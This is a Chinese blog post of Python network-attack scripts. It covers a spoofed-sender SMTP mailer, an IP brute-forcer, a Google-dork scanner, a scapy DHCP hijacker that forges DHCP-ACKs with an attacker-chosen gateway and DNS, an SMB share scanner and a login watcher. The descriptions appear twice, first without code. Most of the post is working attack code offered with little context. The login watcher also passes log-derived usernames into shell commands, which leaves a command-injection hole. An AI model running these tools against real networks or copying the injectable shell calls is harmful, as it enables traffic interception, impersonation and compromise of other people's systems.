[Python] Bargain Box Kung Fu
2015-12-03 16:35
846 查看
1.Spoofing E-mail Sender
这个代码需要用户在本地自建一个SMTP服务器,并且不认证用户。
源码为:
2.IP Brute Forcer
当成功连接到一个网络,但却缺少一个IP地址,DHCP不给你分配,也无法得到IP架构,这种情况下攻击者会尝试着通过暴力猜解的方式得到一个IP。
此程序先配置网卡,然后在ping某个网段的网关,假设回复中含有bytes from,那么就说明我们可以得到一个合法的IP地址
源码为:
程序执行为:
3. Google-Hacks-Scanner
会用到google模块,先将要搜索的词保存在一个文件中,本例中为dic.txt,然后google.research()函数会利用谷歌进行搜索,之后通过re的正则表达式跳出谷歌搜索出的URL中带有“twitter”关键字的URL,并打印出来。
还有一点需要注意,如果搜索的过快地话,查询会被谷歌阻断。
源码:
4.DHCP Hijack
通过sniff函数捕获所有端口号为67的UDP包,随后检查该包是否是DHCP-Request,如果是,则构建一个假的DHCP-ACK包。
源码:
捕获的数据包:
5.SMB-Share-Scanner
此代码是一个用于查找开放的SMB共享的简单扫描器。
首先利用函数get_ips()来计算IP范围,之后随即迭代所有的IP地址,并且调用外部命令smbclient,此命令尝试列出所有未经认证的SMB共享。
源码:
6.Login Watcher
源码:
这个代码需要用户在本地自建一个SMTP服务器,并且不认证用户。
源码为:
import socket HOST = 'localhost' PORT = 25 MAIL_TO = "someone@on_the_inter.net" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setblocking(0) sock.connect((HOST,PORT)) sock.send('HELO du.da') sock.send('MAIL FROM: wweihnachtsmann@nordpol.net') print repr(sock.recv(1024)) sock.send('RCPT TO:' + MAIL_TO) print repr(sock.recv(1024)) sock.send('DATA') sock.send('Subject: Dein Wunschzettel') sock.send('Selbstverstaendlich bekommst Du Dein Pony!') sock.send('Mfg der Weihnachtsmann') sock.send('.') print repr(sock.recv(1024)) sock.send('QUIT') print repr(sock.recv(1024)) sock.close()
2.IP Brute Forcer
当成功连接到一个网络,但却缺少一个IP地址,DHCP不给你分配,也无法得到IP架构,这种情况下攻击者会尝试着通过暴力猜解的方式得到一个IP。
此程序先配置网卡,然后在ping某个网段的网关,假设回复中含有bytes from,那么就说明我们可以得到一个合法的IP地址
源码为:
import os import re import sys from random import randint device = "wlan0" ips = range(1,254) def ping_ip(ip): fh = os.popen("ping -c 1 -W 1 " + ip) resp = fh.read() if re.search("bytes from", resp, re.MULTILINE): print "Got response from " + ip sys.exit(1) while len(ips) > 0: host_byte = randint(2,253) idx = randint(0, len(ips)-1) ip = ips[idx] del ips[idx] print "Checking net 10.0." + str(ip) + ".0" cmd = "ifconfig " + device + str(ip) + "." + str(host_byte) + "up" os.system(cmd) ping_ip("10.0." + str(ip) + ".1") ping_ip("10.0." + str(ip) + ".254")
程序执行为:
3. Google-Hacks-Scanner
会用到google模块,先将要搜索的词保存在一个文件中,本例中为dic.txt,然后google.research()函数会利用谷歌进行搜索,之后通过re的正则表达式跳出谷歌搜索出的URL中带有“twitter”关键字的URL,并打印出来。
还有一点需要注意,如果搜索的过快地话,查询会被谷歌阻断。
源码:
import re import sys import google import urllib2 if len(sys.argv) < 2: print sys.argv[0] + ": <dict>" sys.exit(1) fh = open(sys.argv[1]) for word in fh.readlines(): print "\nSearching for " + word.strip() results = google.search(word.strip(),pause=5) try: for link in results: if re.search("twitter", link): print link except KeyError: pass except urllib2.HTTPError, e: print "Google search failed: " + str(e)程序运行过程:
4.DHCP Hijack
通过sniff函数捕获所有端口号为67的UDP包,随后检查该包是否是DHCP-Request,如果是,则构建一个假的DHCP-ACK包。
源码:
import sys import getopt import random import scapy.all as scapy dev = "eth0" gateway = None nameserver = None dhcpserver = None client_net = "192.168.1." filter = "udp port 67" def handle_packet(packet): eth = packet.getlayer(scapy.Ether) ip = packet.getlayer(scapy.IP) udp = packet.getlayer(scapy.UDP) bootp = packet.getlayer(scapy.BOOTP) dhcp = packet.getlayer(scapy.DHCP) dhcp_message_type = None if not dhcp: return False for opt in dhcp.options: if opt[0] == "message-type": dhcp_message_type = opt[1] #dhcp request if dhcp_message_type == 3: client_ip = client_net + str(random.randint(2,254)) dhcp_ack = scapy.Ether(src=eth.dst, dst=eth.src) / scapy.IP(src=dhcpserver, dst=client_ip) / scapy.UDP(sport=udp.dport,dport=udp.sport) / scapy.BOOTP(op=2, chaddr=eth.dst, siaddr=gateway, yiaddr=client_ip, xid=bootp.xid) / scapy.DHCP(options=[('message-type',5),('requested_addr',client_ip),('subnet_mask','255.255.255.0'),('router',gateway),('name_server',nameserver),('end')]) print "Send spoofed DHCP ACK to %s" % ip.src scapy.sendp(dhcp_ack, iface=dev) def usage(): print sys.argv[0] + """ -d <dns_ip> -g <gateway_ip> -i <dev> -s <dhcp_ip>""" sys.exit(1) try: cmd_opts = "d:g:i:s:" opts, args = getopt.getopt(sys.argv[1:], cmd_opts) except getopt.GetoptError: usage() for opt in opts: if opt[0] == "-i": dev = opt[1] elif opt[0] == "-g": gateway = opt[1] elif opt[0] == "-d": nameserver = opt[1] elif opt[0] == "-s": dhcpserver = opt[1] else: usage() if not gateway: gateway = scapy.get_if_addr(dev) if not nameserver: nameserver = gateway if not dhcpserver: dhcpserver = gateway print "Hijacking DHCP requests on %s" % (dev) scapy.sniff(iface=dev, filter=filter, prn=handle_packet)程序运行过程:
捕获的数据包:
5.SMB-Share-Scanner
此代码是一个用于查找开放的SMB共享的简单扫描器。
首先利用函数get_ips()来计算IP范围,之后随即迭代所有的IP地址,并且调用外部命令smbclient,此命令尝试列出所有未经认证的SMB共享。
源码:
import sys import os from random import randint def get_ips(start_ip, stop_ip): ips = [] tmp = [] for i in start_ip.split('.'): tmp.append("%02X" % long(i)) start_dec = long(''.join(tmp), 16) tmp = [] for i in stop_ip.split('.'): tmp.append("%02X" % long(i)) stop_dec = long(''.join(tmp), 16) while(start_dec < stop_dec+1): bytes = [] bytes.append(str(int(start_dec / 16777216))) rem = start_dec % 16777216 bytes.append(str(int(rem / 65536))) rem = rem % 65536 bytes.append(str(int(rem / 256))) rem = rem % 256 bytes.append(str(rem)) ips.append(".".join(bytes)) start_dec += 1 return ips def smb_share_scan(ip): os.system("smbclient -q -N -L" + ip) if len(sys.argv) < 2: print sys.argv[0] + ": <start_ip-stop_ip>" sys.exit(1) else: if sys.argv[1].find('-') > 0: start_ip, stop_ip = sys.argv[1].split("-") ips = get_ips(start_ip, stop_ip) while len(ips) > 0: i = randint(0, len(ips)-1) lookup_ip = str(ips[i]) del ips[i] smb_share_scan(lookup_ip) else: smb_share_scan(sys.argv[1])程序运行过程:
6.Login Watcher
源码:
import os import re import tailer import random logfile = "/var/log/auth.log" max_failed = 3 max_failed_cmd = "/sbin/shutdown -h now" failed_login = {} success_patterns = [re.compile("Accepted password for (?P<user>.+?) from (?P<host>.+?) port"),re.compile("session opened for user (?P<user>.+?) by")] failed_patterns = [re.compile("Failed password for (?P<user>.+?) from (?P<host>.+?) port"),re.compile("FAILED LOGIN (\(\d\)) on '(.+?)' FOR '(?P<user>.+?)'"),re.compile("authentication failure\;.+?user\=(?P<user>.+?)\s+.+?\s+user\=(.+)")] shutdown_msgs = [ "Eat my shorts", "Follow the white rabbit", "System will explode in three seconds!", "Go home and leave me alone.", "Game... Over!" ] def check_match(line, pattern, failed_login_check): found = False match = pattern.search(line) if(match != None): found = True failed_login.setdefault(match.group('user'),0) # Remote login failed if(match.group('host') != None and failed_login_check): os.system("echo 'Login for user " + match.group('user') + " from host " + match.group('host') + " failed!' | festival --tts") failed_login[match.group('user')] += 1 # Remote login successful elif(match.group('host') != None and not failed_login_check): os.system("echo 'User " + match.group('user') + " logged in from host " + match.group('host') + "' | festival --tts") failed_login[match.group('user')] = 0 # Local login successful elif(match.group('user') != "CRON" and not failed_login_check): os.system("echo 'User " + match.group('user') + "logged in' | festival --tts") failed_login[match.group('user')] = 0 # Too many failed login? if failed_login[match.group('user')] >= max_failed: os.system("echo '" + random.choice(shutdown_msgs) + "' | festival --tts") os.system(max_failed_cmd) return found for line in tailer.follow(open(logfile)): found = False for pattern in failed_patterns: found = check_match(line, pattern, True) if found: break if not found: for pattern in success_patterns: found = check_match(line, pattern, False) if found: break
相关文章推荐
- Python学习笔记
- [python基础]关于中文编码和解码那点事儿
- python之Tkinter控件学习
- python CGI 编程环境搭建
- python 模块之platform模块(基本了解)
- python从SUMO中获取车辆平均行驶时间
- 关于Python中的yield
- Windows下Python pip的安装
- python 模块之os.path模块
- Python-排序
- Python之美[从菜鸟到高手]--生成器之全景分析
- [python]函数
- LeetCode解题报告-- Count and Say
- python与BeautifulSouop计算SUMO仿真的到达速率
- 【python】FTP客户端
- python一个进程——多线程threading的实现
- python调用API
- python 怎么模拟加header(如User-Agent、Content-Type等等)
- python入门--切片,迭代,列表生成
- python学习之路之案例0(实现登录功能,登录错误次数超过3次,自动退出登录)